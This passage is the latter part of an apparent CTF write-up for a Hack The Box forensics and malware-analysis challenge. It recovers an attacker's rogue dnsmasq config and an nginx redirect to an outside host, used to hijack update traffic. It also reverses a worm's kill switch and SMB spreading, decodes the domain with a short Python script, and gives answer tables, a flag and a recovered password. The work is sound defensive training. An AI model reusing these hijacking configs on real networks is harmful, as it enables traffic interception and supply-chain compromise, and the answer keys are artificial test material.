3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
└─$ cat files | grep -i 'dnsmasq.conf'
0x9b33882a9000 / 8:1 1053837 0x9b33a3df8140 REG 1 1 -rw-r--r-- 2025-09-03 08:20:33.219196 UTC 2024-11-29 12:55:04.000000 UTC 2025-09-03 08:20:33.255196 UTC /var/lib/dpkg/info/dnsmasq.conffiles 219
0x9b33882a9000 / 8:1 298784 0x9b33a3df61a0 REG 7 7 -rw-r--r-- 2025-09-03 08:20:32.000000 UTC 2024-11-29 12:55:04.000000 UTC 2025-09-03 08:20:33.191196 UTC /usr/share/doc/dnsmasq-base/examples/dnsmasq.conf.example 27381
0x9b33882a9000 / 8:1 298807 0x9b33a3d49860 REG 1 1 -rw-r--r-- 2025-09-03 08:20:32.000000 UTC 2024-11-29 12:55:04.000000 UTC 2025-09-03 08:20:33.251196 UTC /usr/lib/tmpfiles.d/dnsmasq.conf 35
0x9b33882a9000 / 8:1 1832539 0x9b33ac25aae0 REG 1 1 -rw-r--r-- 2025-09-03 08:21:30.991480 UTC 2025-09-03 08:21:06.343371 UTC 2025-09-03 08:21:06.343371 UTC /etc/dnsmasq.conf 261
0x9b33882a9000 / 8:1 1832491 0x9b33a3d68f20 REG 1 1 -rw-r--r-- 2025-09-03 08:20:33.303196 UTC 2024-11-29 12:55:04.000000 UTC 2025-09-03 08:20:33.299196 UTC /etc/dbus-1/system.d/dnsmasq.conf 652
└─$ python3 ~/Desktop/Tools/volatility3/vol.py -f memdump.mem linux.pagecache.InodePages --inode=0x9b33ac25aae0 --dump
└─$ cat inode_0x9b33ac25aae0.dmp
interface=ens224
dhcp-range=192.168.211.30,192.168.211.240,1h
dhcp-option=3,192.168.211.8
dhcp-option=6,192.168.211.8
no-hosts
no-resolv
server=8.8.8.8
address=/updates.cogwork-1.net/192.168.211.8
log-queries=no
quiet-dhcp
quiet-dhcp6
log-facility=/dev/null
Easy to see that attacker create a Nginx configuration file and use it with docker, after that remove it. Let’s check it
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ cat files | grep -i 'default.conf'
0x9b33882a9000 / 8:1 654096 0x9b33ac030f20 REG 1 1 -rw-r--r-- 2025-09-03 08:21:52.859555 UTC 2025-09-03 08:21:52.859555 UTC 2025-09-03 08:22:17.959623 UTC /tmp/default.conf 136
# ...
└─$ python3 ~/Desktop/Tools/volatility3/vol.py -f memdump.mem linux.pagecache.InodePages --inode=0x9b33ac030f20 --dump
└─$ cat inode_0x9b33ac030f20.dmp
server {
listen 80;
location / {
proxy_pass http://13.62.49.86:7477/;
proxy_set_header Host jm_supply;
}
}
And we end the challenge with final answer is updates.cogwork-1.net,13.62.49.86:7477
Final Answer
| Question | Answer |
|---|---|
| 1. What is the Linux kernel version of the provided image? | 5.10.0-35-amd64 |
| 2. The attacker connected over SSH and executed initial reconnaissance commands. What is the PID of the shell they used? | 13608 |
| 3. After the initial information gathering, the attacker authenticated as a different user to escalate privileges. Identify and submit that user’s credentials. | jm:WATSON0 |
| 4. The attacker downloaded and executed code from Pastebin to install a rootkit. What is the full path of the malicious file? | /usr/lib/modules/5.10.0-35-amd64/kernel/lib/Nullincrevenge.ko |
| 5. What is the email account of the alleged author of the malicious file? | i-am-the@network.now |
| 6. The next step in the attack involved issuing commands to modify the network settings and installing a new package. What is the name and PID of the package? | dnsmasq,38687 |
| 7. Clearly, the attacker’s goal is to impersonate the entire network. One workstation was already tricked and got its new malicious network configuration. What is the workstation’s hostname? | Parallax-5-WS-3 |
| 8. After receiving the new malicious network configuration, the user accessed the City of CogWork-1 internal portal from this workstation. What is their username? | mike.sullivan |
| 9. Finally, the user updated a software to the latest version, as suggested on the internal portal, and fell victim to a supply chain attack. From which Web endpoint was the update downloaded? | /win10/update/CogSoftware/AetherDesk-v74-77.exe |
| 10. To perform this attack, the attacker redirected the original update domain to a malicious one. Identify the original domain and the final redirect IP address and port. | updates.cogwork-1.net,13.62.49.86:7477 |
~ The Payload (hard) ~
Note before start !
I’m new to malware reverse engineering, so there may be a lot that’s not quite right. Please forgive any mistakes or omissions
Detail
With the malware extracted, Holmes inspects its logic. The strain spreads silently across the entire network. Its goal? Not destruction-but something more persistent…friends. NOTE: The downloaded file is active malware. Take the necessary precautions when attempting this challenge.
1
2
3
4
5
6
7
8
9
10
1. During execution, the malware initializes the COM library on its main thread. Based on the imported functions, which DLL is responsible for providing this functionality? (filename.ext)
2. Which GUID is used by the binary to instantiate the object containing the data and code for execution? (********-****-****-****-************)
3. Which .NET framework feature is the attacker using to bridge calls between a managed .NET class and an unmanaged native binary? (string)
4. Which Opcode in the disassembly is responsible for calling the first function from the managed code? (** ** **)
5. Identify the multiplication and addition constants used by the binary's key generation algorithm for decryption. (*, **h)
6. Which Opcode in the disassembly is responsible for calling the decryption logic from the managed code? (** ** **)
7. Which Win32 API is being utilized by the binary to resolve the killswitch domain name? (string)
8. Which network-related API does the binary use to gather details about each shared resource on a server? (string)
9. Which Opcode is responsible for running the encrypted payload? (** ** **)
10. Find → Block → Flag: Identify the killswitch domain, spawn the Docker to block it, and claim the flag. (HTB{*******_**********_********_*****})
Solution
Question 1: During execution, the malware initializes the COM library on its main thread. Based on the imported functions, which DLL is responsible for providing this functionality?
After read this https://learn.microsoft.com/en-us/windows/win32/com/the-com-library. I know when basic COM services was used, all COM threads must call the CoInitialize or CoInitializeEx first. Based on this, we can find it on IDA’s “Import” tab.
So the answer is ole32.dll
Question 2: Which GUID is used by the binary to instantiate the object containing the data and code for execution?
Let’s see pseudocode code. The binary calls CoCreateInstance() to instantiate a COM object. Easy to see that value of GUID is dabcd999-1234-4567-89ab-1234567890ff
Question 3: Which .NET framework feature is the attacker using to bridge calls between a managed .NET class and an unmanaged native binary?
With the help of ChatGPT, the answer is COM Interop
Question 4: Which Opcode in the disassembly is responsible for calling the first function from the managed code?
Find where the code call 1st func and synchronize it on Hex view, we can find the answer is FF 50 68
Question 5: Identify the multiplication and addition constants used by the binary’s key generation algorithm for decryption.
Looking through the decompilation, we can find the key generation in this.
Question 6: Which Opcode in the disassembly is responsible for calling the decryption logic from the managed code?
After all key setup, func SendEncryptedFlag() was called. Opcode: FF 50 58
Question 7: Which Win32 API is being utilized by the binary to resolve the killswitch domain name?
After the decryption routine, getaddrinfo() was called
The result of this call determines the [Kill Switch Triggered] or [No Kill Switch Detected] message is printed.
Question 8: Which network-related API does the binary use to gather details about each shared resource on a server?
After passing kill switch check stage, we can find the code responsible for scanning the network.
Go to ScanAndSpread():
NetShareEnum was called to list all available SMB on the remote host.
Question 9: Which Opcode is responsible for running the encrypted payload?
It call Execute for running all payload
Question 10: Find → Block → Flag: Identify the killswitch domain, spawn the Docker to block it, and claim the flag.
Before decryption routine there is a hardcoded Base64 string “KXgmYHMADxsV8uHiuPPB3w==” which prepare for that routine.
Using the key generation algorithm which mention above ((i * 7 + 0x42)) to generate full key. After that xor the value of decode b64 with key and in the end we have the killswitch domain
1
2
3
4
5
6
7
8
9
10
11
12
13
import base64
b64_enc = "KXgmYHMADxsV8uHiuPPB3w=="
b64_decbyte = base64.b64decode(b64_enc)
key = bytes(((i * 7 + 0x42) & 0xFF) for i in range(32))
out_byte = bytearray(b64_decbyte[i] ^ key[i] for i in range(len(b64_decbyte)))
out = out_byte.decode()
print(out)
# Output: k1v7-echosim.net
Final Answer
| Question | Answer |
|---|---|
| 1. During execution, the malware initializes the COM library on its main thread. Based on the imported functions, which DLL is responsible for providing this functionality? | ole32.dll |
| 2. Which GUID is used by the binary to instantiate the object containing the data and code for execution? | dabcd999-1234-4567-89ab-1234567890ff |
| 3. Which .NET framework feature is the attacker using to bridge calls between a managed .NET class and an unmanaged native binary? | COM Interop |
| 4. Which Opcode in the disassembly is responsible for calling the first function from the managed code? | FF 50 68 |
| 5. Identify the multiplication and addition constants used by the binary’s key generation algorithm for decryption. | 7, 42h |
| 6. Which Opcode in the disassembly is responsible for calling the decryption logic from the managed code? | FF 50 58 |
| 7. Which Win32 API is being utilized by the binary to resolve the killswitch domain name? | getaddrinfo |
| 8. Which network-related API does the binary use to gather details about each shared resource on a server? | NetShareEnum |
| 9. Which Opcode is responsible for running the encrypted payload? | FF 50 60 |
| 10. Find → Block → Flag: Identify the killswitch domain, spawn the Docker to block it, and claim the flag. | HTB{Eternal_Companions_Reunited_Again} |
The End
Thanks for reading ^___^